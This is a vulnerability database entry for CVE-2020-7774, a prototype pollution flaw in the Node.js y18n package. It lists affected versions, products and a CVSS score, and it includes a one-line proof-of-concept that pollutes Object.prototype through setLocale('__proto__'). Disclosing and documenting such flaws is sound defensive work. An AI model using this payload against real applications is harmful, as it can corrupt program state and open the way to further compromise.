ID CVE-2020-7774
Summary This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
References
Vulnerable Configurations
  • cpe:2.3:a:y18n_project:y18n:-:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:-:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:1.0.0:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:1.0.0:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:1.1.0:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:1.1.0:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:2.0.0:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:2.0.0:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:3.0.0:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:3.0.0:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:3.1.0:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:3.1.0:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:3.2.0:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:3.2.0:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:3.2.1:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:3.2.1:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:4.0.0:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:4.0.0:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:5.0.0:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:5.0.0:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:5.0.1:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:5.0.1:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:5.0.2:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:5.0.2:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:5.0.3:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:5.0.3:*:*:*:*:node.js:*:*
  • cpe:2.3:a:y18n_project:y18n:5.0.4:*:*:*:*:node.js:*:*
    cpe:2.3:a:y18n_project:y18n:5.0.4:*:*:*:*:node.js:*:*
  • cpe:2.3:a:oracle:graalvm:19.3.5:*:*:*:enterprise:*:*:*
    cpe:2.3:a:oracle:graalvm:19.3.5:*:*:*:enterprise:*:*:*
  • cpe:2.3:a:oracle:graalvm:20.3.1.2:*:*:*:enterprise:*:*:*
    cpe:2.3:a:oracle:graalvm:20.3.1.2:*:*:*:enterprise:*:*:*
  • cpe:2.3:a:oracle:graalvm:21.0.0.2:*:*:*:enterprise:*:*:*
    cpe:2.3:a:oracle:graalvm:21.0.0.2:*:*:*:enterprise:*:*:*
  • cpe:2.3:a:siemens:sinec_infrastructure_network_services:*:*:*:*:*:*:*:*
    cpe:2.3:a:siemens:sinec_infrastructure_network_services:*:*:*:*:*:*:*:*
CVSS
Base: 7.5 (as of 19-04-2022 - 15:41)
Impact:
Exploitability:
CWE CWE-915
CAPEC
Access
VectorComplexityAuthentication
NETWORK LOW NONE
Impact
ConfidentialityIntegrityAvailability
PARTIAL PARTIAL PARTIAL
cvss-vector via4 AV:N/AC:L/Au:N/C:P/I:P/A:P
redhat via4
rpms
  • rh-nodejs12-nodejs-0:12.19.1-2.el7
  • rh-nodejs12-nodejs-debuginfo-0:12.19.1-2.el7
  • rh-nodejs12-nodejs-devel-0:12.19.1-2.el7
  • rh-nodejs12-nodejs-docs-0:12.19.1-2.el7
  • rh-nodejs12-npm-0:6.14.8-12.19.1.2.el7
  • nodejs-1:12.19.1-1.module+el8.3.0+8851+b7b41ca0
  • nodejs-debuginfo-1:12.19.1-1.module+el8.3.0+8851+b7b41ca0
  • nodejs-debugsource-1:12.19.1-1.module+el8.3.0+8851+b7b41ca0
  • nodejs-devel-1:12.19.1-1.module+el8.3.0+8851+b7b41ca0
  • nodejs-docs-1:12.19.1-1.module+el8.3.0+8851+b7b41ca0
  • nodejs-full-i18n-1:12.19.1-1.module+el8.3.0+8851+b7b41ca0
  • nodejs-nodemon-0:1.18.3-1.module+el8.1.0+3369+37ae6a45
  • nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45
  • npm-1:6.14.8-1.12.19.1.1.module+el8.3.0+8851+b7b41ca0
refmap via4
misc
Last major update 19-04-2022 - 15:41
Published 17-11-2020 - 13:15
Last modified 19-04-2022 - 15:41
Back to Top